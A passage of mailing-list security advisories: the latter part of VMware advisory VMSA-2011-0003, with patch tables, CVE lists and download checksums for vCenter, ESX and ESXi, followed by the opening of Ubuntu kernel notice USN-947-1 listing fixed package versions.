4.1       Windows  not applicable **\n    Update Manager 4.0       Windows  not applicable **\n    Update Manager 1.0       Windows  not applicable **\n\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      not applicable **\n    ESX            3.5       ESX      not applicable **\n    ESX            3.0.3     ESX      not applicable **\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Oracle (Sun) JRE 1.5.0 family\n\nd. vCenter Update Manager Oracle (Sun) JRE is updated to version\n   1.5.0_26\n\n    Oracle (Sun) JRE update to version 1.5.0_26, which addresses\n    multiple security issues that existed in earlier releases of\n    Oracle (Sun) JRE. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,\n    CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,\n    CVE-2010-3565,CVE-2010-3568, CVE-2010-3569,  CVE-2009-3555,\n    CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,\n    CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,\n    CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,\n    CVE-2010-3574. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  not applicable **\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    Update Manager 4.1       Windows  Update 1\n    Update Manager 4.0       Windows  affected, patch pending\n    Update Manager 1.0       Windows  affected, no patch planned\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      not applicable **\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, no patch planned\n    ESX            3.0.3     ESX      affected, no patch planned\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Oracle (Sun) JRE 1.6.0 family\n\n e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28\n\n    Apache Tomcat updated to version 6.0.28, which addresses multiple\n    security issues that existed in earlier releases of Apache Tomcat\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i\n    and CVE-2009-3548. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  not applicable **\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not applicable **\n    ESX            3.0.3     ESX      not applicable **\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Apache Tomcat 5.5 family\n\n f. vCenter Server third party component OpenSSL updated to version\n    0.9.8n\n\n    The version of the OpenSSL library in vCenter Server is updated to\n    0.9.8n. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-0740 and CVE-2010-0433 to the\n    issues addressed in this version of OpenSSL. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            any       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE,  Fusion. \n\n g. ESX third party component OpenSSL updated to version 0.9.8p\n\n    The version of the ESX OpenSSL library is updated to 0.9.8p. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-3864 and CVE-2010-2939 to the\n    issues addressed in this update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n    ESXi           4.1       ESXi     ESXi410-201101201-SG\n    ESXi           4.0       ESXi     affected, patch pending\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n h. ESXi third party component cURL updated\n\n    The version of cURL library in ESXi is updated. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2010-0734 to the issues addressed in\n    this update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           4.1       ESXi     ESXi410-201101201-SG\n    ESXi           4.0       ESXi     affected, patch pending\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            any       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n i. ESX third party component pam_krb5 updated\n\n    The version of pam_krb5 library is updated. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-3825 and CVE-2009-1384 to the\n    issues addressed in the update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n j. ESX third party update for Service Console kernel\n\n    The Service Console kernel is updated to include kernel version\n    2.6.18-194.11.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,\n    CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,\n    CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,\n    CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,\n    CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,\n    CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,\n    CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and\n    CVE-2010-3081 to the issues addressed in the update. \n\n    Note: This update also addresses the 64-bit compatibility mode\n    stack pointer underflow issue identified by CVE-2010-3081. This\n    issue was patched in an ESX 4.1 patch prior to the release of\n    ESX 4.1 Update 1. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the checksum of your downloaded file. \n\n   VMware vCenter Server 4.1 Update 1 and modules\n   ----------------------------------------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n   http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html\n\n   File type: .iso\n   md5sum: 729cf247aa5d33ceec431c86377eee1a\n   sha1sum: c1e10a5fcbc1ae9d13348d43541d574c563d66f0\n\n   File type: .zip\n   md5sum: fd1441bef48a153f2807f6823790e2f0\n   sha1sum: 31737a816ed1c08ab3a505fb6db2483f49ad7c19\n\n   VMware vSphere Client\n   File type: .exe\n   md5sum: cb6aa91ada1289575355d79e8c2a9f8e\n   sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESXi 4.1 Installable Update 1\n   -----------------------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html\n   http://kb.vmware.com/kb/1027919\n\n   File type: .iso\n   MD5SUM: d68d6c2e040a87cd04cd18c04c22c998\n   SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1)\n   File type: .zip\n   MD5SUM: 2f1e009c046b20042fae3b7ca42a840f\n   SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0)\n   File type: .zip\n   MD5SUM: 67b924618d196dafaf268a7691bd1a0f\n   SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516 \t\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5)\n   File type: .zip\n   MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4\n   SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488 \t\n\n   VMware Tools CD image for Linux Guest OSes\n   File type: .iso\n   MD5SUM: dad66fa8ece1dd121c302f45444daa70\n   SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af \t\n\n   VMware vSphere Client\n   File type: .exe\n   MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e\n   SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESXi Installable Update 1 contains the following security bulletins:\n   ESXi410-201101201-SG. \n\n   ESX 4.1 Update 1\n   ----------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html\n   http://kb.vmware.com/kb/1029353\n\n   ESX 4.1 Update 1 (DVD ISO)\n   File type: .iso\n   md5sum: b9a275b419a20c7bedf31c0bf64f504e\n   sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11 \t\n\n   ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1)\n   File type: .zip\n   md5sum: 2d81a87e994aa2b329036f11d90b4c14\n   sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798 \t\n\n   Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1\n   File type: .zip\n   md5sum: 75f8cebfd55d8a81deb57c27def963c2\n   sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2 \t\n\n   ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0)\n   File type: .zip\n   md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2\n   sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922 \t\n\n   VMware Tools CD image for Linux Guest OSes\n   File type: .iso\n   md5sum: dad66fa8ece1dd121c302f45444daa70\n   sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af \t\n\n   VMware vSphere Client\n   File type: .exe\n   md5sum: cb6aa91ada1289575355d79e8c2a9f8e\n   sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESX410-Update01 contains the following security bulletins:\n   ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL,\n   Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904\n   ESX410-201101226-SG (glibc)      | http://kb.vmware.com/kb/1031330\n\n   ESX410-Update01 also contains the following non-security bulletins\n   ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG,\n   ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG,\n   ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG,\n   ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG,\n   ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG,\n   ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG. \n\n   To install an individual bulletin use esxupdate with the -b option. \n\n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2928\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0087\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0089\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0090\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0841\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0843\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0844\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0846\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0849\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0850\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1157\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0433\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0734\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1084\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2066\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2070\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2226\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2248\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2521\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2524\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0415\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0437\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4308\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0003\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0007\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0307\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1086\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0410\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0730\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0291\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0622\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1087\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1088\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1187\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1436\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1641\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574\n\n- ------------------------------------------------------------------------\n6. Change log\n\n2011-02-10  VMSA-2011-0003\nInitial security advisory in conjunction with the release of vCenter\nServer 4.1 Update 1, vCenter Update Manager 4.1 Update 1, ESXi 4.1\nUpdate 1, and ESX 4.1 Update 1 on 2011-02-10. \n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisories\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2011 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAk1U1eoACgkQS2KysvBH1xm3swCfeh4sWvPOubDT1K7QlRj3SjW9\ndxYAmwbNLMR9IG/rKZDYh9hqcf4IldCX\n=2pVj\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. ===========================================================\nUbuntu Security Notice USN-947-1              June 03, 2010\nlinux, linux-source-2.6.15 vulnerabilities\nCVE-2009-4271, CVE-2009-4537, CVE-2010-0008, CVE-2010-0298,\nCVE-2010-0306, CVE-2010-0419, CVE-2010-0437, CVE-2010-0727,\nCVE-2010-0741, CVE-2010-1083, CVE-2010-1084, CVE-2010-1085,\nCVE-2010-1086, CVE-2010-1087, CVE-2010-1088, CVE-2010-1146,\nCVE-2010-1148, CVE-2010-1162, CVE-2010-1187, CVE-2010-1188,\nCVE-2010-1488\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 9.04\nUbuntu 9.10\nUbuntu 10.04 LTS\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-55-386       2.6.15-55.84\n  linux-image-2.6.15-55-686       2.6.15-55.84\n  linux-image-2.6.15-55-amd64-generic  2.6.15-55.84\n  linux-image-2.6.15-55-amd64-k8  2.6.15-55.84\n  linux-image-2.6.15-55-amd64-server  2.6.15-55.84\n  linux-image-2.6.15-55-amd64-xeon  2.6.15-55.84\n  linux-image-2.6.15-55-hppa32    2.6.15-55.84\n  linux-image-2.6.15-55-hppa32-smp  2.6.15-55.84\n  linux-image-2.6.15-55-hppa64    2.6.15-55.84\n  linux-image-2.6.15-55-hppa64-smp  2.6.15-55.84\n  linux-image-2.6.15-55-itanium   2.6.15-55.84\n  linux-image-2.6.15-55-itanium-smp  2.6.15-55.84\n  linux-image-2.6.15-55-k7        2.6.15-55.84\n  linux-image-2.6.15-55-mckinley  2.6.15-55.84\n  linux-image-2.6.15-55-mckinley-smp  2.6.15-55.84\n  linux-image-2.6.15-55-powerpc   2.6.15-55.84\n  linux-image-2.6.15-55-powerpc-smp  2.6.15-55.84\n  linux-image-2.6.15-55-powerpc64-smp  2.6.15-55.84\n  linux-image-2.6.15-55-server    2.6.15-55.84\n  linux-image-2.6.15-55-server-bigiron  2.6.15-55.84\n  linux-image-2.6.15-55-sparc64   2.6.15-55.84\n  linux-image-2.6.15-55-sparc64-smp  2.6.15-55.84\n\nUbuntu 8.04 LTS:\n  linux-image-2.6.24-28-386       2.6.24-28.70\n  linux-image-2.6.24-28-generic   2.6.24-28.70\n  linux-image-2.6.24-28-hppa32    2.6.24-28.70\n  linux-image-2.6.24-28-hppa64    2.6.24-28.70\n  linux-image-2.6.24-28-itanium   2.6.24-28.70\n  linux-image-2.6.24-28-lpia      2.6.24-28.70\n  linux-image-2.6.24-28-lpiacompat  2.6.24-28.70\n  linux-image-2.6.24-28-mckinley  2.6.24-28.70\n  linux-image-2.6.24-28-openvz    2.6.24-28.70\n  linux-image-2.6.24-28-powerpc   2.6.24-28.70\n  linux-image-2.6.24-28-powerpc-smp  2.6.24-28.70\n  linux-image-2.6.24-28-powerpc64-smp  2.6.24-28.70\n  linux-image-2.6.24-28-rt        2.6.24-28.70\n  linux-image-2.6.24-28-server    2.6.24-28.70\n  linux-image-2.6.24-28-sparc64   2.6.24-28.70\n  linux-image-2.6.24-28-sparc64-smp  2.6.24-28.70\n  linux-image-2.6.24-28-virtual   2.6.24-28.70\n  linux-image-2.6.24-28-xen       2.6.24-28.70\n\nUbuntu 9.04:\n  linux-image-2.6.28-19-generic   2.6.28-19.61\n  linux-image-2.6.28-19-imx51     2.6.28-19.61\n  linux-image-2.6.28-19-iop32x    2.6.28-19.61\n  linux-image-2.6.28-19-ixp4xx    2.6.28-19.61\n  linux-image-2.6.28-19-lpia      2.6.28-19.61\n  linux-image-2.6.28-19-server    2.6.28-19.61\n  linux-image-2.6.28-19-versatile  2.6.28-19.61\n  linux-image-2.6.28-19-virtual   2.6.28-19.61\n\nUbuntu 9.10:\n  linux-image-2.6.31-112-imx51    2.6.31-112.28\n  linux-image-2.6.31-214-dove     2.6.31-214.28\n  linux-image-2.6.31-214-dove-z0  2.6.31-214.28\n  linux-image-2.6.31-22-386       2.6.31-22.60\n  linux-image-2.6.31-22-generic   2.6.31-22.60\n  linux-image-2.6.31-22-generic-pae  2.6.31-22.60\n  linux-image-2.6.31-22-ia64      2.6.31-22.60\n  linux-image-2.6.31-22-lpia      2.6.31-22.60\n  linux-image-2.6.31-22-powerpc   2.6.31-22.60\n  linux-image-2.6.31-22-powerpc-smp  2.6.31-22.60\n  linux-image-2.6.31-22-powerpc64-smp  2.6.31-22.60\n  linux-image-2.6.31-22-server    2.6.31-22.60\n  linux-image-2.6.31-22-sparc64   2.6.31-22.60\n  linux-image-2.6.31-22-sparc64-smp  2.6.31-22.60\n  linux-image-2.6.31-22-virtual   2.6.31-22.60\n  linux-image-2.6.31-307-ec2      2.6.31-307.15\n\nUbuntu 10.04 LTS:\n  linux-image-2.6.31-608-imx51    2.6.31-608.14\n  linux-image-2.6.31-802-st1-5    2.6.31-802.4\n  linux-image-2.6.32-205-dove     2.6.32-205.18\n  linux-image-2.6.32-22-386       2.6.32-22.35\n  linux-image-2.6.32-22-386-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-generic   2.6.32-22.35\n  linux-image-2.6.32-22-generic-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-generic-pae  2.6.32-22.35\n  linux-image-2.6.32-22-generic-pae-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-ia64      2.6.32-22.35\n  linux-image-2.6.32-22-ia64-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-lpia      2.6.32-22.35\n  linux-image-2.6.32-22-lpia-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc   2.6.32-22.35\n  linux-image-2.6.32-22-powerpc-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc-smp  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc-smp-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc64-smp  2.6.32-22.35\n  linux-image-2.6.32-22-powerpc64-smp-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-preempt   2.6.32-22.35\n  linux-image-2.6.32-22-preempt-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-server    2.6.32-22.35\n  linux-image-2.6.32-22-server-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-sparc64   2.6.32-22.35\n  linux-image-2.6.32-22-sparc64-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-sparc64-smp  2.6.32-22.35\n  linux-image-2.6.32-22-sparc64-smp-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-versatile  2.6.32-22.35\n  linux-image-2.6.32-22-versatile-dbgsym  2.6.32-22.35\n  linux-image-2.6.32-22-virtual   2.6.32-22.35\n  linux-image-2.6.32-306-ec2      2.6.32-306.11\n  linux-image-2.6.33-501-omap     2.6.33-501.7\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well. \n\nDetails follow:\n\nIt was discovered that the Linux kernel did not correctly handle 